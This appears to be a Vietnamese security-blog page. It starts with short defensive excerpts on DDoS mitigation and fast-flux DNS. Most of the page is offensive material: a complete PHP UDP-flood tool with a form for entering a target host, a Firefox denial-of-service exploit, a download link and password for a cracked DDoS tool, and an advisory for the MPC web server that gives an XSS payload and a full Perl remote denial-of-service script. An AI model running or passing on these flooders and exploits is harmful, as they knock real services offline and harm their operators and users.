DDoS và nguyên tắc hành động cụ thể

Sau hai notes:
- DDoS và nguyên tắc chống chọi.
- DDoS và nguyên tắc phân tích gói tin.


Một số bạn hỏi tôi "hành động cụ thể" ra làm sao? Đây là câu hỏi khó vì mitigate DDoS là công việc cực kỳ khó khăn. Việc này chẳng những đòi hỏi phải am hiểu giao thức mạng một cách tinh tế để xác định mình đang bị tấn công như thế nào mà còn đòi hỏi thấu đáo mô hình, cấu trúc, công nghệ và cách quản lý của hệ thống đang bị lâm nạn. Không có một thiết bị kỳ diệu nào có thể tự động nhận diện và khắc phục DDoS một cách dễ dàng cả.

Như tôi đã đề cập trong bài đầu tiên: "Cản lọc không dừng lại ở MỖI TẦNG mà ở trên TẤT CẢ CÁC TẦNG GIAO THỨC bất cứ nơi đâu có thể được, thậm chí phối hợp giữa các tầng." và việc này chỉ có thể do NGƯỜI THẬT thực hiện. Hãy bàn đến mô hình để nắm rõ hơn tại sao việc thấu đáo nó là tối quan trọng.
READ MORE »

DDoS và nguyên tắc phân tích gói tin

Như đã đề cập ở bài trước (xem tại đây)

Giảm thiểu tác hại của DDoS có hai hướng chính:
1) Giảm thiểu bằng cách cản lọc những đặc điểm cụ thể.
2) Giảm thiểu bằng cách cản lọc theo ấn định số lần truy cập trong một khoản thời gian (nếu không tìm ra được đặc điểm cụ thể).

Từ những thông tin nào có thể giúp mình thực hiện việc giảm thiểu ấy? Cách khó nhất, tỉ mỉ nhất nhưng cũng chính xác nhất là lấy thông tin từ những gói tin bắt được trong lúc chúng tràn vào mục tiêu (để thực hiện việc DDoS).
READ MORE »

DDoS và nguyên tắc chống chọi

Tóm tắt những điểm tối quan trọng trong việc chống chọi với DDoS (distributed denial of service attack) cho những ai quan tâm.

- DDoS có nhiều dạng, nhiều biến thái tấn công nhưng tựu trung có một mục đích: làm người dùng không thể sử dụng được dịch vụ.

- DDoS có hai dạng chính:
1) làm ngập băng thông khiến cho người dùng không thể truy cập dịch vụ.
2) làm cho dịch vụ hoàn toàn tê liệt vì hết tài nguyên khiến cho người dùng không thể truy cập dịch vụ.

Chống đỡ hai dạng trên đều đòi hỏi gia tăng tài nguyên (băng thông, CPU, diskspace, memory). Tài nguyên càng phát tán rộng ra nhiều network càng tốt.

READ MORE »

Fast flux DNS

I. Khái niệm

- Fast flux DNS là một kĩ thuật các botnet sử dụng để che giấu các trang web lừa đảo, có mã độc phía sau một mạng các máy tính bị kiểm soát đóng vai trò là proxy. Những máy tính trong mạng này có các bản ghi DNS thay đổi rất nhanh, một số trường hợp chỉ trong vòng vài phút. Cơ cấu thay đổi bản ghi DNS nhanh chóng này khiến việc tìm ra và chặn đứng các hoạt động bất hợp pháp trở nên khó khăn hơn nhiều.

- Fast flux DNS được nhận biết vào tháng 11/2006 nhưng đến tháng 7/2007 mới bắt đầu gây được sự chú ý.

READ MORE »

PHP Server DDoSer [V2.0]

[!] PHP Server DDoSer [!]
Version: 2.0

<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<title>PHP DDoSer</title>
<center>
<body background="http://www.popsci.com/files/imagecache/related_info_thumbnail/articles/BlackHoleSimulation.jpg">
<font color="FF3636">
<font size= "6">
<font size="5">
<pre>  

</pre>
<b>Your IP:</b> <font color="blue"><?php echo $ip; ?></font>&nbsp;(Don't Hit yourself)<br><br><font color="red">
</font>
<STYLE>
input{
background-color: white; font-size: 10pt; color: black; font-family: Tahoma; border: 1 solid #66;
}
button{
background-color:# FF0303; font-size: 8pt; color: black; font-family: Tahoma; border: 1 solid #66;
}
body {

}
</style>
<?php
//UDP
if(isset($_GET['host'])&&isset($_GET['time'])){
    $packets = 0;
    ignore_user_abort(TRUE);
    set_time_limit(0);

    $exec_time = $_GET['time'];

    $time = time();
    //print "Started: ".time('d-m-y h:i:s')."<br>";
    $max_time = $time+$exec_time;

    $host = $_GET['host'];

    for($i=0;$i<65000;$i++){
    $out .= 'X';
    }
    while(1){
    $packets++;
    if(time() > $max_time){
    break;
    }
    $rand = rand(1,65000);
    $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
    if($fp){
    fwrite($fp, $out);
    fclose($fp);
    }
    }
    echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
    echo '<br><br>
  <form action="'.$surl.'" method=GET>
  <input type="hidden" name="act" value="phptools">
  Host: <br><input type=text name=host><br>
  Length (seconds): <br><input type=text name=time><br>
  <input type=submit value=Go></form>';
}else{ echo '<br><b>UDP Flood</b><br>
    <form action=? method=GET>
    <input type="hidden" name="act" value="phptools">
    Host: <br><input type=text name=host value=><br>
    Length (seconds): <br><input type=text name=time value=><br><br>
    <input type=submit value=Go></form>';
}
?>
<marquee behavior="scroll" direction="right"><font color="limegreen"><center><strong>Edited By 3v!L Of Anonymous Pakistan</strong></font></marquee>
</center>
</body>
</html>

Follow: http://www.madleets.com/

Simple PHP Script Anti Flood DDoS

<?php
//
// Description : Script anti flood
// Version      : 0.0.1
// Auteur       : Atmoner
// Url          : http://httpscript.org
//
if (!isset($_SESSION)) {
    session_start();
}
// anti flood protection
if($_SESSION['last_session_request'] > time() - 2){
    // users will be redirected to this page if it makes requests faster than 2 seconds
    header("location: http://junookyo.blogspot.com/");
    exit;
}
$_SESSION['last_session_request'] = time();
?>

Follow: http://www.madleets.com/

[VIDEO] Thử nghiệm Slowloris+ với WebHunter 4.5

[VIDEO] Thử nghiệm Slowloris+ với WebHunter 4.5

Mozilla Firefox Remote Denial of Service Vulnerability

Mozilla Firefox is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to make the affected computer unresponsive, denying service to legitimate users.

Mozilla Firefox 14.01 is affected; prior versions may also be affected.

Code exploit:
 

<html>
<head>
<title></title>
</head>
<body></body>
<script>
function e(x)
{
  document.body.innerHTML += x;
  e(x + 'x');
};

e('x')
</script>
</html>

DaRKDDoSeR 5.6c Cracked

 

• Download: http://www.mediafire.com/?3abooy322o5t8r8
• Pass Unlock: junookyo

Media Player Classic XSS / Denial Of Service

==========================================================================================
MPC (Media Player Classic) WebServer Multiple Vulnerabilities
==========================================================================================
 
:------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : MPC (Media Player Classic) WebServer Multiple Vulnerabilities
: # Date : 16 November 2012
: # Author : X-Cisadane
: # Download : http://mpc-hc.sourceforge.net/downloads/ OR Download K-Lite Mega Codec Pack http://codecguide.com/download_mega.htm
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : XSS Vulnerability and Remote Denial of Service Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:------------------------------------------------------------------------------------------------------------------------------------:
WHAT IS MPC WebServer?
======================
Media Player Classic (MPC) is a compact free software media player for Microsoft Windows. The application mimics the look and feel of the old,
light-weight Windows Media Player 6.4 but uses a completely different codebase, integrating most options and features found in modern media players.
Media Player Classic (MPC) WebServer is part of Media Player Classic features that is a web based Remote control. You can controlling Media Player Classic from your Web Browser.
 
 
HOW TO ACTIVATE MPC WebServer?
==============================
Make sure you have installed Media Player Classic or K-Lite Mega Codec Pack. Run your Media Player Classic, click 'View' Menu from the Menu Bar then choose 'Options...'.
In the Options Window, choose Web Interface. Enable “Listen on port”, Disable “Allow access from localhost only”.
You can change the port it listens on but that’s optional (default is 13579). Apply and click 'Launch in web browser...' Or Access it from http://localhost:13579/ OR http://IP:13579/.
PIC MPC WebServer : http://i48.tinypic.com/33xfomg.png
 
 
PROOF OF CONCEPT
=================
 
[1] Non Persistent XSS (Tested On Mozilla Firefox 16.0.2)
 
Vulnerable URL : http://IP:Port/browser.html?path=[XSS]
Example : http://localhost:13579/browser.html?path=<script>alert("XSS")</script>
 
PIC XSS : http://i45.tinypic.com/4j3uz4.png
 
[2] Remote Denial of Service (Using Perl Script)
C:\xampp\perl\bin>perl exploitmpc.pl 127.0.0.1 13579
*=============================================================*
* ---   MPC WebServer Remote Denial Of Service             ---*
* ---               By : X-Cisadane                        ---*
* ---  ------------------------------------------------    ---*
* ---  Usage  : perl exploitmpc.pl ( Victim IP ) ( Port )  ---*
* ---                                                      ---*
*=============================================================*
 
Ex : perl exploitmpc.pl 127.0.0.1 13579
Default Port for MPC Web Server is 13579
Please Wait Till Buffer is Done
Attacking the Target, Please Wait Till Pwned
 
PIC Remote DoS : http://i46.tinypic.com/15egs5j.png
 
-------------------------------- [ Code ] --------------------------------------------
#!/usr/bin/perl
use IO::Socket::INET;
use Getopt::Std;
use Socket;
my $SOCKET = "";
$loop = 1000;
$ip = $ARGV[0];
$port = $ARGV[1];
if (! defined $ARGV[0])
{
print "\t*=============================================================*\n";
print "\t* ---    MPC WebServer Remote Denial Of Service             ---*\n";
print "\t* ---          By : X-Cisadane                        ---*\n";
print "\t* ---  ------------------------------------------------    ---*\n";
print "\t* ---  Usage  : perl exploitmpc.pl ( Victim IP ) ( Port )  ---*\n";
print "\t* ---                                                      ---*\n";
print "\t*=============================================================*\n";
print "\n";
print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n";
print "Default Port for MPC Web Server is 13579\n";
 
exit;
}
 
print "\t*=============================================================*\n";
print "\t* ---    MPC WebServer Remote Denial Of Service             ---*\n";
print "\t* ---          By : X-Cisadane                        ---*\n";
print "\t* ---  ------------------------------------------------    ---*\n";
print "\t* ---  Usage  : perl exploitmpc.pl ( Victim IP ) ( Port )  ---*\n";
print "\t* ---                                                      ---*\n";
print "\t*=============================================================*\n";
print "\n";
print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n";
print "Default Port for MPC Web Server is 13579\n";
print "\n";
print " Please Wait Till The Buffer is Done\n";
my $b1 = "\x41" x 100000000;
 
$iaddr = inet_aton($ip) || die "Unknown host: $ip\n";
$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
$proto = getprotobyname('tcp') || die "getprotobyname: $!\n";
 
print "\n";
print " Attacking the Target, Please Wait Till Pwned \n";
 
for ($j=1;$j<$loop;$j++) {
socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!\n";
connect(SOCKET,$paddr) || die "Connection Failed: $! .........Disconnected!\n";
 
$DoS=IO::Socket::INET->new("$ip:$port") or die;
send(SOCKET,$b1, 0) || die "failure sent: $!\n";
 
print $DoS "stor $b1\n";
print $DoS "QUIT\n";
 
close $DoS;
close SOCKET;
}
# exit :
 
# 1337day.com [2012-11-19]